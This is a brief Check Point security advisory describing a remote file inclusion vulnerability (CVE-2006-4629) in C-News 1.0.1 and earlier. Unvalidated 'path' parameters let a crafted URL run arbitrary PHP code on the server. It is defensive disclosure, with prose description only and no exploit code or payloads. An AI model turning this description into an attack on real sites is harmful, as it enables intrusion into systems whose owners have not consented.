Check Point Advisories

Update Protection against C-News 'path' Parameter File Inclusion Vulnerability

Check Point Reference: CPAI-2006-125
Date Published: 13 Nov 2006
Severity: High
Last Updated: Thursday 03 May, 2007
Source: FrSIRT/ADV-2006-3471
Industry Reference:CVE-2006-4629
Protection Provided by:
Who is Vulnerable? C-News version 1.0.1 and prior
Vulnerability Description C-News, a script executed in XHTML/CSS that webmasters use for easy PHP and JavaScript presentation, is prone to a remote file inclusion vulnerability. An attacker can exploit this vulnerability to execute arbitrary PHP code on an affected system via a maliciously crafted URL in the 'path' parameter.
Vulnerability DetailsThe vulnerability is due to input validation errors in multiple scripts that do not validate the 'path' parameter prior to including files. A remote attacker could exploit this flaw via a specially crafted URL. By doing so, the attacker could include various vulnerable scripts and execute arbitrary commands on the vulnerable system.

Protection Overview

×
  Feedback
This website uses cookies for its functionality and for analytics and marketing purposes. By continuing to use this website, you agree to the use of cookies. For more information, please read our Cookies Notice.
OK